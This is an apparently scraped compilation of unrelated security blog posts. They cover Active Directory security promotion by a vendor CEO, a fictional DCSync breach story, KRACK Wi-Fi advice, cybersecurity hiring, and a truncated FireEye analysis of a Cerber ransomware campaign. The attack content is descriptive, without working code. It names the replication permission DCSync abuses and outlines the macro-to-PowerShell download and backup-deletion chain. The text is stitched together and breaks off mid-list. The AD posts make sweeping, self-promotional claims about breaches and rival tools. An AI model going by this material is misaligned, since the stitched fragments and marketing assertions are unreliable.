All in all, the Microsoft Surface is an incredible device, and because, like Apple's computers, the entire hardware and software is in control of a single vendor, Microsoft has a huge opportunity to deliver a trustworthy computing device to the world, and we'd love to embrace it. Thus, it is vital for Microsoft to ensure that its other components (e.g. Update) do not let the security of its mainstream products down, because per the Principle of Weakest Link, "a system is only as secure as is its weakest link."
For those may not know what Active Directory Security is (i.e. most CEOs, a few CISOs, and most employees and citizens,) suffice it to say that global security may depend on Active Directory Security, and thus may be a matter of paramount defenses.
Most respectfully, Sanjay
PS: Full Disclosure: I had also immediately brought this matter to the attention of the Microsoft Store. They escalated it to Tier-3 support (based out of New Delhi, India), who then asked me to use the Windows Feedback utility to share the relevant evidence with Microsoft, which I immediately and dutifully did, but/and I never heard back from anyone at Microsoft in this regard again.
PS2: Another small request to Microsoft - Dear Microsoft, while at it, could you please also educate your global customer base about the paramount importance of Active Directory Effective Permissions, which is the ONE capability without which not a single object in any Active Directory deployment can be adequately secured! Considering that Active Directory is the foundation of cyber security of over 85% of all organizations worldwide, this is important. Over the last few years, we've had almost 10,000 organizations from 150+ countries knock at our doors, and virtually none of them seem to know this most basic and cardinal fact of Windows Security. I couldn't begin to tell you how shocking it is for us to learn that most Domain Admins and many CISOs out there don't have a clue. Can you imagine just how insecure and vulnerable an organization whose Domain Admins don't even know what Active Directory Effective Permissions are, let alone possessing this paramount capability, could be today?
As we get ready to bid farewell to 2017, it may be fitting to recap notable happenings in Active Directory Security this year.
This appears to have been the year in which the mainstream Cyber Security community finally seems to have realized just how important and in fact paramount Active Directory Security is to cyber security worldwide, in that it appears that they may have finally realized that Active Directory is the very heart and foundation of privileged access at 85% of organizations worldwide!
I say so only because it appears to have been in this year that the following terms seem to have become mainstream cyber security buzzwords worldwide - Privileged User, Privileged Access, Domain Admins, Enterprise Admins, Mimikatz DCSync, AdminSDHolder, Active Directory ACLs, Active Directory Privilege Escalation, Sneaky Persistence in Active Directory, Stealthy Admins in Active Directory, Shadow Admins in Active Directory, Domain Controllers, Active Directory Botnets, etc. etc.
Active Directory Security Goes Mainstream Cyber Security
Here are the 10 notable events in Active Directory Security that helped it get mainstream cyber security attention this year -
Since the beginning on the year, i.e. January 01, 2017, Mimikatz DCSync, an incredibly and dangerously powerful tool built by Benjamin Delpy, that can be used to instantly compromise the credentials of all Active Directory domain user accounts in an organization, including those of all privileged user accounts, has been gaining immense popularity, and appears to have become a must-have tool in every hacker, perpetrator and cyber security penetration-tester's arsenal.
On May 15, 2017, the developers of BloodHound introduced version 1.3, with the objective of enhancing its ability to find privilege escalation paths in Active Directory that could help find out "Who can become Domain Admin?" From that point on, Bloodhound, which is massively inaccurate, seems to have started becoming very popular in the hacking community.
On June 08, 2017, CyberArk a Billion+ $ cyber-security company, and the self-proclaimed leader in Privileged Account Security, introduced the concept of Shadow Admins in Active Directory, as well as released a (massively inaccurate) tool called ACLight to help organizations identify all such Shadow Admins in Active Directory deployments worldwide.
On June 14, 2017, Sean Metcalf, an Active Directory security enthusiast penned an entry-level post "Scanning for Active Directory Privileges and Privileged Accounts" citing that Active Directory Recon is the new hotness since attackers, Red Teamers and penetration testers have realized that control of Active Directory provides power over the organization!
On July 11, 2017, Preempt, a Cyber Security announced that they had found a vulnerability in Microsoft's implementation of LDAP-S that permits the enactment of an NTLM relay attack, and in effect could allow an individual to effectively impersonate a(n already) privileged user and enact certain LDAP operations to gain privileged access.
On July 26, 2017, the developers of (massively inaccurate) BloodHound gave a presentation titled An ACE Up the Sleeve - Designing Active Directory DACL Backdoors at the famed Black Hat Conference USA 2017. This presentation at Black Hat likely played a big role in bringing Active Directory Security to the forefront of mainstream Cyber Security.
Also on July 26, 2017, a second presentation on Active Directory Security at the Black Hat Conference titled The Active Directory Botnet introduced the world to a new attack technique that exploits the default access granted to all Active Directory users, to setup command and control servers within organizations worldwide. This too made waves.
On September 18, 2017, Microsoft's Advanced Threat Analytics (ATA) Team penned a detailed and insightful blog post titled Active Directory Access Control List - Attacks and Defense, citing that recently there has been a lot of attention regarding the use of Active Directory ACLs for privilege escalation in Active Directory environments. Unfortunately, in doing so Microsoft inadvertently ended up revealing just how little its ATA team seems to know about the subject.
On December 12, 2017, Preempt, a Cyber Security announced that they had found a flaw in Microsoft's Azure Active Directory Connect software that could allow Stealthy Admins to gain full domain control. They also suggested that organizations worldwide use their (massively inaccurate) tooling to find these Stealthy Admins in Active Directory.
Helping Defend Microsoft's Global Customer Base ( i.e. 85% of Organizations Worldwide )
Folks, since January 01, 2017, both, as former Microsoft Program Manager for Active Directory Security and as the CEO of Paramount Defenses, I've penned 50+ insightful blog posts to help educate thousands of organizations worldwide about...
...not just the paramount importance of Active Directory Security to their foundational security, but also about how to correctlysecure and defend their foundational Active Directory from every cyber security risk/challenge covered in points 1- 9 above.
I trust you're well. Today, I just wanted to take a few minutes to answer a few questions that I've been asked so many times.
Here are the answers to the Top-5 questions I am frequently asked -
You're the CEO of a company (Paramount Defenses), so why do you blog so often, and how do you have time to do so?
Good question. This is a bit of a unique situation, in that whilst I am the CEO of a company, I am also a subject matter expert in Active Directory Security (simply by virtue of my background) and thus I feel that it is my civic duty to help organizations understand the paramount importance of securing their foundational Active Directory deployments.
In fact, over the last 7+ years, I've penned 150+ blog posts on Active Directory Security (here) and Cyber Security (here) on various topics such as Active Directory Privilege Escalation, the OPM Breach, Kerberos Token Bloat, Eff Perms, AdminSDHolder, Mimikatz DCSync, Sneaky Persistence, How to Correctly Identify Stealthy Admins in Active Directory, How to Correctly Identify Shadow Admins in Active Directory etc. and most recently on Active Directory Botnets.
As to how I have the time to do so, that's actually not that difficult. We have a world-class team at Paramount Defenses, and I've been able to delegate a substantial amount of my CEO-related work amongst our executive leadership team.
Speaking of which, how big is Paramount Defenses?
At Paramount Defenses, we believe that less is more, so our entire global team is less than a 100 people. For security reasons, 100% of our staff are U.S. Citizens, and to-date, the entirety of our R&D team are former Microsoft employees.
If by how big we are, you meant how many organizations we impact, today our unique high-value cyber security solutions and insights help adequately secure and defend thousands of prominent organizations across six continents worldwide.
Why is it just you (and why aren't your employees) on Social Media (e.g. LinkedIn, Facebook, Twitter etc.)?
The simple answer to this question - For Security Reasons.
At Paramount Defenses, we care deeply about cyber security, so we also strive to lead by example in every way.
As it pertains to cyber security, we have found that the presence of an organization's employees on social-media almost always results in excessive information disclosure that could be very valuable for hackers and various other entities who may have malicious intent, so our corporate policies do not permit a social media presence.
Also, we're not huge fans of Twitter, and we certainly don't care about being on Facebook. We do like and appreciate LinkedIn, and in fact, we lead the world's largest community of Active Directory Security Professionals on LinkedIn.
You see, the Crown Jewels of cyber security reside in Active Directory, and if they're compromised, its Game Over. By Crown Jewels, I'm referring to privileged access, or as commonly known, Domain Admin equivalent accounts.
It is a fact that 100% of all major recent cyber security breaches (except Equifax) involved the compromise of a single Active Directory privileged user account. Such accounts are Target #1 for hackers, which is why it is so very important that organizations be able to exactly identify and minimize the number of such privileged accounts in Active Directory.
Now, when it comes to identifying privileged user accounts in Active Directory, most organizations focus on enumerating the memberships of their default administrative groups in Active Directory, and that's it. Unfortunately, that's just the Tip of the Iceberg, and we have found that most of them do not even seem to know that in fact there are FAR many more accounts with varying levels of elevated admin/privileged access in Active Directory than they seem to know about.
This isn't a secret; its something you know if you've ever heard about Active Directory's most powerful and capable cyber security feature - Delegation of Administration. The truth is that at most organizations, a substantial amount of delegation has been done over the years, yet no one seems to have a clue as to who has what privileged access. Here's why.
In fact, Active Directory privileged access accounts have been getting a lot of attention lately, because so many cyber security experts and companies are starting to realize that there exists a treasure-trove of privileged access in Active Directory. Thus, recently many such cyber security expert and companies have started shedding light on them (for example, one, two, three etc.), and some have even started developing amateur tools to identify such accounts.
What these experts and companies may not know is that their amateur tools are substantially inaccurate since they rely on finding out "Who has what Permissions in Active Directory" WHEREAS the ONLY way to correctly identify privileged user accounts in Active Directory is by accurately finding out "Who has what Effective Permissions in Active Directory?"
On a lighter note, I find it rather amusing that for lack of knowing better, most cyber security experts and vendors that may be new to Active Directory Security have been referring to such accounts as Stealthy Admins, Shadow Admins etc.
To make matters worse, there are many prominent vendors in the Active Directory space that merely offer basic Active Directory Permissions Analysis/Audit Tooling, yet they mislead organizations by claiming to help them "Find out who has what privileged access in Active Directory," and since so many IT personnel don't seem to know better, they get misled.
Thus, there's an imperative need to help organizations learn how to correctly audit privileged users in Active Directory.
Consequently, the intention of my blogging is to HELP thousands of organizations and cyber security experts worldwide UNDERSTAND that the ONLY correct way to identify privileged users in Active Directory is by accurately determining effective permissions / effective access in Active Directory. There is only ONE correct way to accomplish this objective.
Why have you been a little hard on Microsoft lately?
Let me begin by saying that I deeply love and care for Microsoft. It may appear that I may have been a tad hard on them, but that is all well-intentioned and only meant to help them realize that they have an obligation to their global customer base to adequately educate them about various aspects of cyber security in Windows, particularly the most vital aspects.
In that regard, if you truly understand cyber security in Windows environments, you know that Active Directory Effective Permissions and Active Directory Effective Access play an absolutely paramount role in securing Windows deployments worldwide, and since Active Directory has been around for almost two decades by now, one would expect the world to unequivocally understand this by now. Unfortunately, we found that (as evidenced above) no one seems to have a clue.
You may be surprised if I were to share with you that at most organizations worldwide, hardly anyone seems to even know about what Active Directory Effective Permissions are, let alone why they're paramount to their security, and this a highly concerning fact, because this means that most organizations worldwide are operating in the proverbial dark today.
It is upon looking into the reason for this that we realized that in the last decade, it appears that (for whatever reason) Microsoft may not have educated its global customer based about Active Directory Effective Permissions at all - Proof.
Thus, it is in the best interest of organizations worldwide that we felt a need to substantially raise awareness.
As to how on earth Microsoft may have completely forgotten to educate the world about this, I can only guess that perhaps they must've gotten so involved in building their Cloud offering and dealing with the menace of local-machine credential-theft attack vectors that they completely seem to have missed this one paramount aspect of Windows security.
Fortunately for them and the world, we've had our eye on this problem for a decade know and we've been laser-focused. Besides, actions speak louder than words, so once you understand what it is we do at Paramount Defenses, you'll see that we've done more to help secure Microsoft's global customer base than possibly any other company on the planet.
Those who understand what we've built, know that we may be Microsoft's most strategic ally in the cyber security space.
Finally, the most important reason as to why I do, what I do is because I care deeply and passionately about cyber security.
There's so much more to share, and I will continue to do so.
A Paramount Global Cyber Security Need
Today, I wanted to take a moment to touch upon one (not so) little aspect of cyber security that today profoundly impacts the foundational security of 85% of all business and government organizations worldwide, including most cyber security companies.
Folks, I am talking about empowering organizations worldwide identify exactly who holds the proverbial "Keys to the Kingdom" i.e. helping them accurately identify exactly who actually possesses what privileged access in Active Directory deployments.
The reason this is so important is because 100% of all major recent cyber security breaches (e.g. Snowden, Target, JP Morgan, Sony, Anthem, OPM) involved the compromise and misuse of guess what - just ONE Active Directory Privileged User Account.
Since we've been silently working on this 2006, we've a head start of about a decade. Over the last few months, we've seen several prominent vendors finally realize the importance of doing so, and we've seen them share guidance to this subject.
Unfortunately, just about every piece of advice out there, whether it be from prominent cyber security experts or billion dollar cyber security companies, on how to actually correctly audit privileged access in Active Directory, is dangerously inaccurate.
There's an old saying - "Actions Speak Louder Than Words." While there's no dearth of talk by so many big names out there on how to improve cyber security, identify privileged users etc., the key to actually (demonstrably and provably) enhancing cyber security lies in actually helping organizations do so, and we've been silently at work for a decade to help organizations do so.
So, in days to come, right here on this blog, I'm going to (hopefully for one last time), share exactly how organizations worldwide can today accurately and efficiently identify privileged access in their foundational Active Directory deployments worldwide.
In doing so, we will yet again demonstrate Thought Leadership in the Cyber Security space. By the way, this is neither about us, nor about pride. I've already said I'm just a nobody (, whose work possibly impacts everybody.) This is about a desire to help.
So, that post should be out right here on this blog next week, possibly as early as Monday morning.
The basic infrastructure that supports our daily lives is deeply dependent on the Internet, and, therefore, continually exposed to the risk of new threats and cyber attacks. As security breaches grow in frequency and sophistication every day, it’s crucial to build resiliency and then take steps to protect critical infrastructure to remain safe and secure online.
It’s important to identify current and future strategies to protect your infrastructure and manage your risk. Cyber security is one of the biggest challenges organizations face today. Regardless of size or industry, every organization must ask themselves, is my security strategy up to date? If your organization is looking to stay on the front line of cyber security, it’s imperative to know how an end-to-end risk management strategy can help you properly secure your infrastructure.
Our security experts have an abundance of experience, and several areas of expertise we can put to work for you. We are committed to keeping your organization safe and secure, and can help design, deploy, and support solutions to address your critical risks and defend your critical infrastructure. For more information, contact one of our security experts today!
With the continuous state of change in the global threat landscape, organizations face cyber attacks and security breaches that are growing in frequency and sophistication every day. But now, consider this: according to a study by the Center for Cyber Safety and Education, there will be a shortage of 1.8 million information security workers by 2022. This gap should be of great concern to organizations.
Skilled people make the difference in protecting sensitive data, so it’s more critical than ever that organizations begin to attract and retain the cybersecurity talent needed to defend against the evolving threat landscape. At Connection, we help inspire individuals coming out of universities to engage in co-op or intern-related opportunities, and I strongly encourage other organizations to see what they can do to help young people today who are really interested in building their skills in this area.
The figures don’t lie. The demand for cyber security will only continue to grow. Through local collaborative efforts between employers, training providers, and community leaders, we can ensure individuals have the opportunity to build on their tech knowledge and participate in a secure, thriving economy.
It’s impossible to overstate the importance of security in today’s digital world. Cyber attacks are growing in frequency and sophistication every day, and a key risk to our economy and security is the lack of professionals to protect our growing networks. According to a study by the Center for Cyber Safety and Education, by 2022, there will be a shortage of 1.8 million information security workers. So, it’s critical that that we begin now to prepare our students—and any others who are interested in making a career move—to fill these gaps. Many colleges and universities have developed information assurance programs that help technical, security-minded students achieve a great foundation in this industry. We also challenge corporations to offer intern and co-op opportunities for students in these degree programs, so they can see what security looks like in practical, business-world applications.
Connection is committed to promoting cyber security and online safety. Cyber security is a viable and rewarding profession and we encourage people from all backgrounds to see information security as an essential career path.
The world has been rocked once again with a serious flaw in a basic security mechanism that we all take for granted to keep us safe and secure. According to Dark Reading, researchers at Belgium’s University of Leuven have uncovered as many as 10 critical vulnerabilities in the Wi-Fi Protected Access II (WPA2) protocol used to secure Wi-Fi networks. This is a protocol that—as we have all learned over the last several years—must be configured to keep us safe.
The key reinstallation attack—or KRACKs—impacts all modern wireless networks using the WPA2 protocol. The flaw gives attackers the ability to decrypt data packets that make all private (encrypted) communication no longer private. Although the flaw requires the attacker to have close proximity to the network to execute, this is especially bad news for those with far-reaching wireless signals—such as hotel and hospital lobbies—where an attacker can just sit down and work their trade.
The Vulnerability Notes Database provides a summary and detailed description of the vulnerabilities. It includes a list of vendors who may be affected by the vulnerability, and a status field indicating whether the vendor has any products that are affected.
What can you do?
Vendors are currently identifying their affected products and working on patches to address this attack. In the meantime, here are a few things you can do to keep your information safe:
Apply patches as they are released
Pay careful attention to your wireless environment
Watch for people and technology that look out of place
Utilize a trusted VPN solution
When possible, transfer data over an encrypted channel—such as HTTPS
Restrict sensitive information that would normally pass over a wireless network
And, as always, it’s a good practice to monitor access logs and wireless traffic to look for anomalies in standard business communication
How has this WiFi vulnerability affected your organization? Leave a comment bellow to share your experience and any additional advice you have for staying protected.
(A Must-Read for all CEOs, CFOs, CIOs, CISOs, Board Members & Shareholders Today)
Today was supposed to be an exciting Friday morning at a Multi-Billion $ organization since the world's top Cloud Computing companies were going to make their final pitches to the company's C-Suite today, as it was considering moving to the "Cloud."
With Cloud Computing companies spending billions to market their latest Kool-Aid to organizations worldwide (even though much of this may actually not be ready for mission-critical stuff), how could this company too NOT be considering the Cloud?
The C-Suite Meeting
Today was a HUGE day for this multi-billion dollar company, for today after several months of researching and evaluating their choices and options, the company's leadership would finally be deciding as to which Cloud Computing provider to go with.
This meeting is being chaired by the Chairman of the Board and attended by the following organizational employees -
Chief Executive Officer (CEO)
Chief Financial Officer (CFO)
Chief Information Officer (CIO)
Chief Information Security Officer (CISO)
Also in attendance are about a dozen Vice Presidents, representing Sales, Marketing, Research and Development etc.
After breakfast, the presentations began at 9:00 am. The organization's CIO kicked off the meeting, rattling off the numerous benefits that the company could enjoy by moving to the Cloud, and minutes later the Vice President of Cloud Computing from the first Cloud Computing company vying for their business started his presentation. His presentation lasted two hours.
The C-Suite then took a break for lunch.
The next presentation began at 1:00 pm and was expected to last till about 4:00 pm. The Vice President of Cloud Computing from the second Cloud Computing company had started her presentation and was almost an hour into it, when all of a sudden this happened...
... the CISO's assistant unexpectedly entered the room, went straight to the CISO and whispered something into his ear.
Everyone was surprised, and all eyes were on the CISO, who grimly asked his assistant - "Are you 100% sure?" He said "Yes."
Houston, We Have a Problem
The CISO walked up to the CIO and whispered something into his ear. The CIO sat there in complete shock for a moment!
He then gathered himself and proceeded to request everyone except the C-Suite to immediately leave the conference room.
He told the Vice President of this Cloud Computing company - "Hopefully, we'll get back to you in a few weeks."
He then looked at the CEO and the Chairman of the Board, and he said - "Sir, we have a problem!"
The CEO asked the CIO - "What's wrong? What happened?"
The CIO replied - "Sir, about 30 minutes ago, an intruder compromised the credentials of each one of our 20,000 employees!"
The CEO was almost in shock, and just couldn't believe what he had just heard, so he asked - "Everyone's credentials?!"
The CIO replied - "I'm afraid yes Sir, yours, mine, literally everyone's, including that of all our privileged users!"
The CEO could sense that there was more bad news, so he asked - "Is there something else I should know?"
The CIO replied - "Sir, 15 minutes ago, the intruder logged on as an Enterprise Admin, disabled the accounts of each one of our privileged users, and used Group Policy to deploy malicious software to each one of our 30,000 domain-joined computers! By now, he could have stolen, exfiltrated and destroyed the entirety of our digital assets! We may have lost literally everything!"
The CEO was shocked! They'd just been breached, and what a massive breach it was - "How could this have happened?"
The CIO turned to the CISO, who stepped in, and answered the question - "Sir, an intruder used a tool called Mimikatz DCSync to basically request and instantly obtain the credentials of every single user from our foundational Active Directory deployment."
The CEO asked - "What is Active Directory?"
The CISO replied - "Sir, simply put, it is the very foundation of our cyber security"
The CEO then asked - "Wait.Can just anyone request and extract credentials from Active Directory?"
The CISO replied - "Sir, not everyone can. Only those individuals whose have sufficient access to do so, and by that I mean, specifically only those who have Get-Replication-Changes-All effective-permissions on the domain root object, can do so."
The CEO then said - "This does not sound right to me. I'm no technical genius, but shouldn't we have known exactly who all have this, whatever you just said, er yes that Get-Replication-Changes-All effective permissions in our Active Directory?!"
The CISO replied - "Sir, it turns out that accurate determination of effective permissions in Active Directory is actually very difficult, and as a result it is almost impossible to figure out exactly who has this effective permissions on our domain root!" The CEO figured it out - "So you're saying that the intruder had compromised the account of someone who was not on your radar and not supposed to have this access, but actually did, and the intruder used that access to steal everyone's credentials?"
The CISO replied - "That's right. It appears we did not know that this someone had sufficient access (i.e. effective permissions) to be able to replicate secrets from Active Directory, because it is very difficult to accurately figure this out in Active Directory."
The CEO was furious! - "You're kidding right?! Microsoft's spent billions on this new fad called the "Cloud", yet it doesn't even have a solution to help figure out something as vital as this in Active Directory? How long has Active Directory been around ?!
The CISO replied - "Seventeen years."
The CEO then said in disbelief - "Did you just 17 years, as in S-E-V-E-N-T-E-E-N years?! Get Satya Nadella on the line now! Perhaps I should #REFRESH his memory that we're a customer, and that we may have just lost a few B-I-L-L-I-O-N dollars!"
This is for Real
Make NO mistake about it. As amusing as it might sound, the scenario shared above is very REAL, and in fact today, most business and government organizations worldwide that operate on Active Directory have no idea as to exactly who has sufficient effective permissions to be able to replicate secrets out of their Active Directory. None whatsoever!
We can demonstrate the enactment of this exact scenario, and its underlying cause, to any organizations that wishes to see it.
This Could've Been (and Can Be) Easily Prevented
This situation could easily have been prevented, if this organization's IT personnel had only possessed the ability to adequately and accurately determine effective permissions in their foundational Active Directory deployments.
Unfortunately, Mimikatz DCSync is just the Tip of the Iceberg. Today most organizations are likely operating in the dark and have no idea about the actual attack surface, and thus about exactly who can create, delete and manage the entirety of their domain user accounts, domain computer accounts, domain security groups, GPOs, service connection points (SCPs), OUs etc. even though every insider and intruder could try and figure this out and misuse this insight to compromise their security.
Technically speaking, with even just minimal education and the right tooling, here is how easy it is for organizations to figure this out and lock this down today, i.e. to lock this down before an intruder can exploit it to inflict colossal damage - RIGHT HERE.
Oh, and you don't need to call Microsoft for this, although you certainly can and should. If you do, they'll likely have no answer, yet they might use even this to pitch you their latest toy, Microsoft ATA, and of course, their Cloud offering, Microsoft Azure.
Wait, weren't these C*O discussing the Cloud (and likely Microsoft Azure) just a few hours (and a few billion dollars) ago?!
Unfortunately, given the massive scale of this breach, the company did not survive the attack, and had to declare bankruptcy. The C*Os of this company are still looking for suitable employment, and its shareholders ended up losing billions of dollars.
All of this could've been prevented, if they only knew about something as elemental as this, and had the ability to determine this.
The moral of the story is that while its fine to fall for the latest fad, i.e. consider moving to the "Cloud" and all, but as AND while you consider and plan to do so, you just cannot let you on-prem cyber defenses down even for a moment, because if you do so, you may not have a company left to move to the Cloud. A single excessive effective permission in Active Directory is all it takes.
I'll say this one more time and one last time - what I've shared above could easily happen at almost any organization today.
PS: If this sounds too simple and high-level i.e. hardly technical, that is by intent, as it is written for a non-technical audience. This isn't to showcase our technical depth; examples of our technical depth can be found here, here, here, here, hereetc.etc.
Here's why - Mimikatz DCSync, which embodies the technical brilliance of a certain Mr. Benjamin Delpy, may be the simplest example of how someone could attack Active Directory ACLs to instantly and completely compromise Active Directory. On the other hand, Gold Finger, which embodies the technical expertise of a certain former Microsoft employee, may be the simplest example of how one could defend Active Directory ACLs by being able to instantly identify/audit effective permissions/access in/across Active Directory, and thus lockdown any and all unauthorized access in Active Directory ACLs, making it impossible for an(y) unauthorized user to use Mimikatz DCSync against Active Directory.
PS3: They say to the wise, a hint is enough. I just painted the whole picture out for you. (You may also want to read this & this.)
You'll want to read this short blog post very carefully because it not only impacts Microsoft, it likely impacts you, as well as the foundational security of 85% of all business and government organizations worldwide, and it does so in a positive way.
A Quick and Short Background
From the White House to the Fortune 1000, Microsoft Active Directory is the very foundation of cyber security at over 85% of organizations worldwide. In fact, it is also the foundation of cyber security of almost every cyber security company worldwide.
Active Directory is the Foundation of Cyber Security Worldwide
The entirety of an organization's building blocks of cyber security, including the user accounts used by the entirety its workforce, as well as the user accounts of all its privileged users, the computer accounts of the entirety of its computers, and the security groups used to provision access to the entirety of its IT resources, are stored, managed and protected in Active Directory.
During the past few years, credential-theft attacks aimed at the compromise of an organization's privileged users (e.g. Domain Admins) have resulted in a substantial number of reported and unreported breaches at numerous organizations worldwide. In response, to help organizations combat the menace of these credential-theft attacks, Microsoft has had to make substantial enhancements to its Windows Operating Systems as well as acquire and introduce a technology called Microsoft ATA.
These enhancements have made it harder for perpetrators to find success with traditional credential-theft attacks, so they've started focusing their efforts on trying to find ways to attack the Active Directory itself, as evidenced by the fact that in the last year alone, we've seen the introduction of Mimikatz DCSync, BloodHound and recently the advent of Active Directory Botnets.
Make no mistake about it. There's no dearth of opportunity to find ways to exploit weaknesses in Active Directory deployments because there exists an ocean of access within Active Directory, and sadly due to an almost total lack of awareness, education, understanding and tooling, organizations have no idea as to exactly what lies within their Active Directory, particularly in regards to privileged access entitlements, and thus today there likely are 1000s of privilege escalation paths in most Active Directory deployments, waiting to be identified and exploited. All that perpetrators seem to lack today is the know-how and the tooling.
Unfortunately, since the cat's out of the bag, perpetrators seem to be learning fast, and building rapidly, so unless organizations act swiftly and decisively to adequately lock-down vast amount of access that currently exists in their foundational Active Directory deployments, sadly the next big wave of cyber breaches could involve compromise of Active Directory deployments.
Clearly, Microsoft Has No Answers
It gives me absolutely no pleasure to share with you that unfortunately, and sadly as always, Microsoft yet again seems to be playing catch-up, and in fact, it has no clue or any real answers, ideas or solutions to help organizations in this vital regard.
Here's Proof - Last week, on September 18, 2017, Microsoft's Advanced Threat Analytics (ATA) Team posted this -
If and when you read it, it will likely be unequivocally clear to you as to just how little Microsoft understands about not just the sheer depth and breadth of this monumental challenge, but about the sheer impact it could have on organizations worldwide!
You see, if you understand the subject of Active Directory Security well enough, then you know that Active Directory access control lists (ACLs) today don't just impact organizational security worldwide, they likely impact national and global security!
That said, in that post, the best Microsoft could do isconcede that this could be a problem, wonder why organizations might ever need to change AdminSDHolder, falsely assume that it may not impact privileged users, praise a massively inaccurate tool for shedding light on this attack vector, and end by saying - "if you find a path with no obstacles, it probably leads somewhere."
Oh, and the very last thing they tell you that is their nascent ATA technology can detect AD multiple recon methods.
In contrast, here's what they should have said- "We care deeply about cyber security and we understand that left unaddressed, this could pose a serious cyber security risk to our customers. Be rest assured that Microsoft Active Directory is a highly robust and securable technology, and here's exactly how organizations can adequately and reliably identify and lock-down privileged access in their Active Directory deployments, leaving no room for perpetrators to identify and exploit any weaknesses."
The reason I say that should've been the response is because if you know enough about this problem, then you also know that it can actually be completely and sufficiently addressed, and that you don't need to rely on detection as a security measure.
BTW, to appreciate how little Microsoft seems to understand about this huge cyber security challenge, you'll want a yardstick to compare Microsoft's response with, so here it is (; you'll want to read the posts) - Active Directory Security School for Microsoft.
Er, I'm really sorry but you are Microsoft, a US$ 550 Billion corporation, not a kid in college. If the best you can do concerning such a profoundly important cyber security challenge is show how little you seem to know about and understand this problem, and only have detection to offer as a solution, frankly, that's not just disappointing, that's deeply concerning, to say the least.
Further, if this is how little you seem to understand about such a profoundly important cyber security challenge concerning your own technology, I cannot help but wonder how well your customers might actually be protected in your recent Cloud offering.
Fortunately There's Help and Good News For Microsoft
I may appear to be critical of Microsoft, and I do still believe that they ought to at least have educated their customers about this and this huge cyber security challenge, but I also love Microsoft, because I've been (at) Microsoft, so I'm going to help them.
To my former colleagues at Microsoft I say - "Each one of us at Microsoft are passionate, care deeply and always strive to do and be the best we can, and even though I may no longer be at Microsoft, (and I still can't believe how you missed this one), luckily and fortunately for you, we've got this covered, and we're going to help you out."
So, over the next few days, not only am I going to help reduce the almost total lack of awareness, education and understanding that exists at organizations today concerning Active Directory Security, I am also going to help organizations worldwide learn just how they can adequately and swiftly address this massive cyber security challenge before it becomes a huge problem.
What Constitutes a Privileged User in Active Directory
How to Correctly Audit Privileged Users/Access in Active Directory
How to Render Mimikatz DCSync Useless in an Active Directory Environment
How to Easily Identify and Thwart Sneaky Persistence in Active Directory
How to Easily Solve The Difficult Problem of Active Directory Botnets
The World's Top Active Directory Permissions Analysis Tools(and Why They're Mostly Useless)
The Paramount Need to Lockdown Access Privileges in Active Directory
How to Attain and Maintain Least Privileged Access (LPA) in Active Directory
How to Securely Delegate and Correctly Audit Administrative Access in Active Directory
How to Easily Secure Active Directory and Operate a Bulletproof Active Directory Deployment
You see, each one of these Active Directory security focused objectives can be easily accomplished, but and in order to do so, what is required is the capability to accurately audit effective access in Active Directory. Sadly, let alone possessing this paramount cyber security capability, Microsoft doesn't even seem to have a clue about it.
Each one of these posts is absolutely essential for organizational cyber security worldwide, and if you know of even one other entity (e.g. individual, company etc.) on the planet that can help the world address each one of these today, do let me know.
Together, we can help adequately secure and defend organizations worldwide and deny perpetrators the opportunities and avenues they seek to compromise our foundational Active Directory deployments, because we must and because we can.
Ransomware is a common method of cyber extortion for financial gain
that typically involves users being unable to interact with their
files, applications or systems until a ransom is paid. Accessibility
of cryptocurrency such as Bitcoin has directly contributed to this
ransomware model. Based on data from FireEye Dynamic Threat
Intelligence (DTI), ransomware activities have been rising
fairly steadily since mid-2015.
On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign
involving the distribution of emails with a malicious Microsoft Word
document attached. If a recipient were to open the document a
malicious macro would contact an attacker-controlled website to
download and install the Cerber family of ransomware.
Exploit Guard, a major new feature of FireEye
Endpoint Security (HX), detected the threat and alerted HX
customers on infections in the field so that organizations could
inhibit the deployment of Cerber ransomware. After investigating
further, the FireEye research team worked with security agency
CERT-Netherlands, as well as web hosting providers who unknowingly
hosted the Cerber installer, and were able to shut down that instance
of the Cerber command and control (C2) within hours of detecting the
activity. With the attacker-controlled servers offline, macros and
other malicious payloads configured to download are incapable of
infecting users with ransomware.
FireEye hasn’t seen any additional infections from this attacker
since shutting down the C2 server, although the attacker could
configure one or more additional C2 servers and resume the campaign at
any time. This particular campaign was observed on six unique
endpoints from three different FireEye endpoint security customers. HX
has proven effective at detecting and inhibiting the success of Cerber malware.
The Cerber ransomware attack cycle we observed can be broadly broken
down into eight steps:
Target receives and opens a Word document.
document is invoked to run PowerShell in hidden mode.
Control is passed to PowerShell, which connects to a malicious
site to download the ransomware.
On successful connection,
the ransomware is written to the disk of the victim.
PowerShell executes the ransomware.
configures multiple concurrent persistence mechanisms by creating
command processor, screensaver, startup.run and runonce registry
The executable uses native Windows utilities such as
WMIC and/or VSSAdmin to delete backups and shadow copies.
Files are encrypted and messages are presented to the user
Rather than waiting for the payload to be downloaded or started
around stage four or five of the aforementioned attack cycle, Exploit
Guard provides coverage for most steps of the attack cycle – beginning
in this case at the second step.
The most common way to deliver ransomware is via Word documents with
embedded macros or a Microsoft Office exploit. FireEye Exploit Guard
detects both of these attacks at the initial stage of the attack cycle.
When the victim opens the attached Word document, the malicious
macro writes a small piece of VBScript into memory and executes it.
This VBScript executes PowerShell to connect to an attacker-controlled
server and download the ransomware (profilest.exe), as seen in Figure
Figure 1. Launch sequence of Cerber – the macro
is responsible for invoking PowerShell and PowerShell downloads and
runs the malware
It has been increasingly common for threat actors to use malicious
macros to infect users because the majority of organizations permit
macros to run from Internet-sourced office documents.
In this case we observed the macrocode calling PowerShell to bypass
execution policies – and run in hidden as well as encrypted mode –
with the intention that PowerShell would download the ransomware and
execute it without the knowledge of the victim.
Further investigation of the link and executable showed that every
few seconds the malware hash changed with a more current compilation
timestamp and different appended data bytes – a technique often used
to evade hash-based detection.
Cerber in Action
Initial payload behavior
Upon execution, the Cerber malware will check to see where it is
being launched from. Unless it is being launched from a specific
location (%APPDATA%\<GUID>), it creates a copy of itself
in the victim's %APPDATA% folder under a filename chosen randomly and
obtained from the %WINDIR%\system32 folder.
If the malware is launched from the specific aforementioned folder
and after eliminating any blacklisted filenames from an internal list,
then the malware creates a renamed copy of itself to
“%APPDATA%\<GUID>” using a pseudo-randomly selected name
from the “system32” directory. The malware executes the malware from
the new location and then cleans up after itself.
As with many other ransomware families, Cerber will bypass UAC
checks, delete any volume shadow copies and disable safe boot options.
Cerber accomplished this by launching the following processes using
People may wonder why victims pay the ransom to the threat actors.
